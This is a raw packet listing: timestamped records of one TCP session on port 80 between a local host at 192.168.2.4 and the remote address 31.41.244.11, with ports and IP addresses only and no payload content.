Dec 22, 2024 02:16:12.864864111 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.864923000 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.864969969 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.865046978 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.866780996 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.866838932 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.866911888 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.866976023 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.868727922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.868783951 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.868870974 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.868936062 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.870798111 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.870835066 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.870853901 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.870894909 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.872617006 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.872719049 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.872725964 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.872772932 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.874550104 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.874602079 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.874615908 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.874659061 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.876468897 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.876529932 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.876602888 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.876667976 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.878411055 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.878474951 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.878504992 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.878571033 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.880363941 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.880419970 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.880475998 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.880526066 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.882358074 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.882411003 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.882431984 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.882464886 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.884238958 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.884291887 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.884299040 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.884347916 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.886188030 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.886243105 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.886317015 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.886365891 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.888103962 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.888164043 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.888237000 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.888303995 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.890033960 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.890094042 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.890139103 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.890194893 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.891987085 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.892043114 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.892117977 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.892180920 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.893919945 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.893980026 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.894073009 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.894129038 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.895858049 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.895914078 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.896003962 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.896063089 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.897814035 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.897882938 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.897924900 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.897994041 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.899750948 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.899811029 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.899872065 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.899933100 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.901689053 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.901746035 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.901810884 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.901864052 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.903611898 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.903711081 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.903717041 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.903767109 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.905549049 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.905610085 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.905668020 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.905728102 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.907507896 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.907568932 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.907613039 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.907659054 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.909430981 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.909488916 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.909497023 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.909559965 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.005662918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.005747080 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.005758047 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.005815029 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.006463051 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.006537914 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.006561995 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.006614923 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.008057117 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.008112907 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.008183956 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.008244991 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.009625912 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.009681940 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.009788036 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.009839058 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.011254072 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.011288881 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.011326075 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.011360884 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.012757063 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.012809992 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.012881994 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.012954950 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.014317989 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.014375925 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.014440060 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.014511108 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.015851021 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.015903950 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.015909910 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.015966892 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.017355919 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.017407894 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.017482996 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.017539024 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.018894911 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.018946886 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.018954039 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.019009113 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.020355940 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.020411015 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.020474911 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.020539045 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.021831036 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.021936893 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.021946907 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.022008896 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.023269892 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.023344040 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.023397923 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.023458958 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.024720907 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.024772882 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.024844885 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.024904013 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.026155949 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.026212931 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.026273966 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.026329041 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.027553082 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.027604103 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.027842999 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.027896881 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.028983116 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.029038906 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.029107094 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.029167891 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.030359030 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.030443907 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.030745983 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.030803919 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.031753063 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.031847954 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.031929016 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.032032967 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.033112049 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.033179998 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.033233881 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.033288002 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.034480095 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.034538031 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.034609079 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.034674883 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.035840988 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.035913944 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.035948992 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.036010981 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.037201881 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.037286997 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.037317991 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.037370920 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.038615942 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.038686991 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.038827896 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.038885117 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.039937019 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.040009022 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.040081978 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.040143967 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.041301012 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.041368008 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.041456938 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.041511059 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.042673111 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.042738914 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.042797089 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.042870045 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.044025898 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.044080973 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.044143915 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.044223070 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.045391083 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.045447111 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.045526981 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.045579910 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.163644075 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.163697004 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.163708925 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.163744926 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.164880991 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.164917946 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.164936066 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.164999962 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.283236027 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.283380985 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.283385038 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.283441067 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.284312010 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.284348011 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.284374952 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.284408092 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.402754068 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.402806997 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.402837992 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.402864933 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.402903080 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.402906895 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.402906895 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.402947903 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.402956009 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.403007030 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.403017998 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.403053999 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.403065920 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.403090954 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.403105021 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.403127909 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.403140068 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.403163910 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.403171062 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.403199911 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.403213024 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.403238058 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.403243065 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.403283119 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.403872967 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.403911114 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.403928041 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.403944969 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.403959990 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.403980970 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.403990984 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.404017925 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.404020071 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.404063940 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.404675961 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.404730082 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.404730082 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.404767036 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.404776096 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.404802084 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.404809952 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.404835939 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.404849052 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.404872894 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.404879093 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.404911995 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.405522108 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.405575991 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.405580044 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.405616045 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.405627012 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.405649900 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.405662060 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.405684948 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.405692101 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.405726910 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.406485081 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.406519890 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.406533957 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.406553984 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.406555891 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.406589031 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.406595945 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.406622887 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.406666040 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.406678915 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.406711102 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.406719923 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.407294035 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.407331944 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.407346964 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.407381058 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.407388926 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.407418013 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.407422066 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.407454014 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.407459974 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.407495022 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.408107996 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.408142090 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.408154011 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.408185959 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.409363031 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.409399986 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.409415960 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.409435987 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.409444094 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.409471035 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.409471989 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.409507036 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.409518003 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.409543037 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.409548998 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.409584999 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.410198927 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.410233974 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.410243988 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.410271883 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.410271883 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.410306931 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.410319090 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.410341978 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.410352945 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.410382032 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.411077976 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.411112070 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.411123991 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.411147118 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.411158085 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.411190033 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.411206961 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.411241055 CET	80	49765	31.41.244.11	192.168.2.4
